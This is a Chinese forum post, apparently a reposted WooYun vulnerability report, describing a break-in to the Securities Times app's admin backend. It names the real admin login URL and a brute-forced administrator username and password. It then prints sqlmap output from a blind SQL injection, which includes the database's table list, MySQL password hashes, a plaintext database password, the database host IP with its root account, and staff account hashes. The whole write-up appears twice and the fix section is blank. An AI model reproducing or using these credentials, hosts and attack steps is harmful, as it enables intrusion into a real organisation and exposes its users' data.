HanDs
管理员

[7月漏洞公开] 证券时报APPSQ注入影响所有注册用户 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

RT

详细说明:

WooYun: 证券时报某漏洞(涉及APP/数据库/证券/股票走势等)



根据这个漏洞说的。可以得到APP管理后台,其实也不用,大可以在APP中找到。



http://appzd.zxzx.stcn.com/admin/admin/adminLogin.do



这里

爆破一下用户名,验证码有问题。直接爆破成功。

code 区域
lidongping  123456





登录进去。

1.png





找到SQL:



code 区域
back-end DBMS: MySQL 5.0
Database: zhengquanshibaoapp
[79 tables]
+-----------------------------------------+
| bt_config |
| bt_rights |
| t_admin |
| t_banner |
| t_blocks |
| t_category |
| t_category_common |
| t_combination |
| t_combination_common |
| t_combination_favorite |
| t_combination_read |
| t_common |
| t_common_prev |
| t_favorable |
| t_favorable_category |
| t_folder |
| t_folder_rights |
| t_identity |
| t_identity_role |
| t_message |
| t_message_user |
| t_new_case |
| t_newcase_read |
| t_order |
| t_orderItem |
| t_region |
| t_role |
| t_role_rights |
| t_socket_news |
| t_symbol |
| t_tencentpost |
| t_token |
| t_user |
| t_user_category |
| t_user_device |
| t_user_track_Spider |
| t_user_track_lyc |
| t_v_combinationfavorite |
| test_c3p0 |
| v_t_admin |
| v_t_app_user_order_category |
| v_t_article_category |
| v_t_blocks_admin |
| v_t_blocks_category |
| v_t_category_common_block |
| v_t_category_common_combination_commmon |
| v_t_category_favorable |
| v_t_combination_category |
| v_t_combination_category_all |
| v_t_combination_category_all_app |
| v_t_combination_category_user |
| v_t_combination_common |
| v_t_combination_common_category |
| v_t_combination_common_top |
| v_t_combination_preview |
| v_t_combination_read |
| v_t_combination_read_app |
| v_t_combination_user_read |
| v_t_common_admin |
| v_t_common_category_admin |
| v_t_common_prev_admin |
| v_t_config_admin |
| v_t_folder_rights |
| v_t_folder_rights_role |
| v_t_message_admin |
| v_t_message_no_user |
| v_t_message_user |
| v_t_message_user_admin |
| v_t_message_user_admin_sta |
| v_t_order_orderItem |
| v_t_order_orderitem |
| v_t_role_identity |
| v_t_role_rights_menu |
| v_t_statistics |
| v_t_symbol_admin |
| v_t_user_device_info |
| v_t_user_order_category |
| v_t_user_order_orderItem |
| v_t_user_region |
+-----------------------------------------+

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
Type: boolean-based blind



跑出



database management system users password hashes:

[*] readonly [1]:

password hash: NULL

[*] root [5]:

password hash: *39581AB63696F01812388F6F9A9D2E47CB29ABB2

password hash: *A600763916E936C01BCBE0E4136574F3C4E3E5CD

password hash: *B0D78FF9CCB69C7D308259E76EA231B5E6DAA4D2 *****

password hash: *FD5953C1B8CF02528A1577028DFF6244116087DE fo9iU1

password hash: NULL

[*] user1 [1]:

password hash: NULL

[*] zqsb_app [1]:

password hash: *B0D78FF9CCB69C7D308259E76EA231B5E6DAA4D2

[*] zqsbapp [3]:

password hash: *39581AB63696F01812388F6F9A9D2E47CB29ABB2

password hash: *B0D78FF9CCB69C7D308259E76EA231B5E6DAA4D2

password hash: *F352D2FDFB850B4CC196D08DD822ADD5CFD2BB42





之前数据库密码

Quattro!



[*] ''@'localhost'

[*] ''@'localhost.localdomain'

[*] 'readonly'@'121.15.5.177'

[*] 'root'@'115.29.185.90' *

[*] 'root'@'121.15.5.177'

[*] 'root'@'127.0.0.1'

[*] 'root'@'172.18.10.73'

[*] 'root'@'localhost'

[*] 'root'@'localhost.localdomain'

[*] 'user1'@'121.15.139.172'

[*] 'user1'@'121.15.5.177'

[*] 'zqsb_app'@'121.15.5.177'

[*] 'zqsbapp'@'127.0.0.1'

[*] 'zqsbapp'@'192.168.10.29'

[*] 'zqsbapp'@'192.168.10.53'



数据库密码。得到数据库的地址为

115.29.185.90

账号为root

密码为B0D78FF9CCB69C7D308259E76EA231B5E6DAA4D2



账号:

liuyufeng e24d3a6718be9dd73a94a3277c8ee6fa

hemin 143e4ff1b57893f8a62fb729cfa187f6

进入后台:

code 区域

3.png





4.png



6.png





影响APP所有用户。

漏洞证明:

WooYun: 证券时报某漏洞(涉及APP/数据库/证券/股票走势等)



根据这个漏洞说的。可以得到APP管理后台,其实也不用,大可以在APP中找到。



http://appzd.zxzx.stcn.com/admin/admin/adminLogin.do



这里

爆破一下用户名,验证码有问题。直接爆破成功。

code 区域
lidongping  123456





登录进去。

1.png





找到SQL:



code 区域
back-end DBMS: MySQL 5.0
Database: zhengquanshibaoapp
[79 tables]
+-----------------------------------------+
| bt_config |
| bt_rights |
| t_admin |
| t_banner |
| t_blocks |
| t_category |
| t_category_common |
| t_combination |
| t_combination_common |
| t_combination_favorite |
| t_combination_read |
| t_common |
| t_common_prev |
| t_favorable |
| t_favorable_category |
| t_folder |
| t_folder_rights |
| t_identity |
| t_identity_role |
| t_message |
| t_message_user |
| t_new_case |
| t_newcase_read |
| t_order |
| t_orderItem |
| t_region |
| t_role |
| t_role_rights |
| t_socket_news |
| t_symbol |
| t_tencentpost |
| t_token |
| t_user |
| t_user_category |
| t_user_device |
| t_user_track_Spider |
| t_user_track_lyc |
| t_v_combinationfavorite |
| test_c3p0 |
| v_t_admin |
| v_t_app_user_order_category |
| v_t_article_category |
| v_t_blocks_admin |
| v_t_blocks_category |
| v_t_category_common_block |
| v_t_category_common_combination_commmon |
| v_t_category_favorable |
| v_t_combination_category |
| v_t_combination_category_all |
| v_t_combination_category_all_app |
| v_t_combination_category_user |
| v_t_combination_common |
| v_t_combination_common_category |
| v_t_combination_common_top |
| v_t_combination_preview |
| v_t_combination_read |
| v_t_combination_read_app |
| v_t_combination_user_read |
| v_t_common_admin |
| v_t_common_category_admin |
| v_t_common_prev_admin |
| v_t_config_admin |
| v_t_folder_rights |
| v_t_folder_rights_role |
| v_t_message_admin |
| v_t_message_no_user |
| v_t_message_user |
| v_t_message_user_admin |
| v_t_message_user_admin_sta |
| v_t_order_orderItem |
| v_t_order_orderitem |
| v_t_role_identity |
| v_t_role_rights_menu |
| v_t_statistics |
| v_t_symbol_admin |
| v_t_user_device_info |
| v_t_user_order_category |
| v_t_user_order_orderItem |
| v_t_user_region |
+-----------------------------------------+

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
Type: boolean-based blind



跑出



database management system users password hashes:

[*] readonly [1]:

password hash: NULL

[*] root [5]:

password hash: *39581AB63696F01812388F6F9A9D2E47CB29ABB2

password hash: *A600763916E936C01BCBE0E4136574F3C4E3E5CD

password hash: *B0D78FF9CCB69C7D308259E76EA231B5E6DAA4D2 *****

password hash: *FD5953C1B8CF02528A1577028DFF6244116087DE fo9iU1

password hash: NULL

[*] user1 [1]:

password hash: NULL

[*] zqsb_app [1]:

password hash: *B0D78FF9CCB69C7D308259E76EA231B5E6DAA4D2

[*] zqsbapp [3]:

password hash: *39581AB63696F01812388F6F9A9D2E47CB29ABB2

password hash: *B0D78FF9CCB69C7D308259E76EA231B5E6DAA4D2

password hash: *F352D2FDFB850B4CC196D08DD822ADD5CFD2BB42





之前数据库密码

Quattro!



[*] ''@'localhost'

[*] ''@'localhost.localdomain'

[*] 'readonly'@'121.15.5.177'

[*] 'root'@'115.29.185.90' *

[*] 'root'@'121.15.5.177'

[*] 'root'@'127.0.0.1'

[*] 'root'@'172.18.10.73'

[*] 'root'@'localhost'

[*] 'root'@'localhost.localdomain'

[*] 'user1'@'121.15.139.172'

[*] 'user1'@'121.15.5.177'

[*] 'zqsb_app'@'121.15.5.177'

[*] 'zqsbapp'@'127.0.0.1'

[*] 'zqsbapp'@'192.168.10.29'

[*] 'zqsbapp'@'192.168.10.53'



数据库密码。得到数据库的地址为

115.29.185.90

账号为root

密码为B0D78FF9CCB69C7D308259E76EA231B5E6DAA4D2



账号:

liuyufeng e24d3a6718be9dd73a94a3277c8ee6fa

hemin 143e4ff1b57893f8a62fb729cfa187f6

进入后台:

code 区域

3.png





4.png



6.png





影响APP所有用户。

修复方案:


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
证券
#1楼
发帖时间:2016-7-19   |   查看数:0   |   回复数:0
游客组
快速回复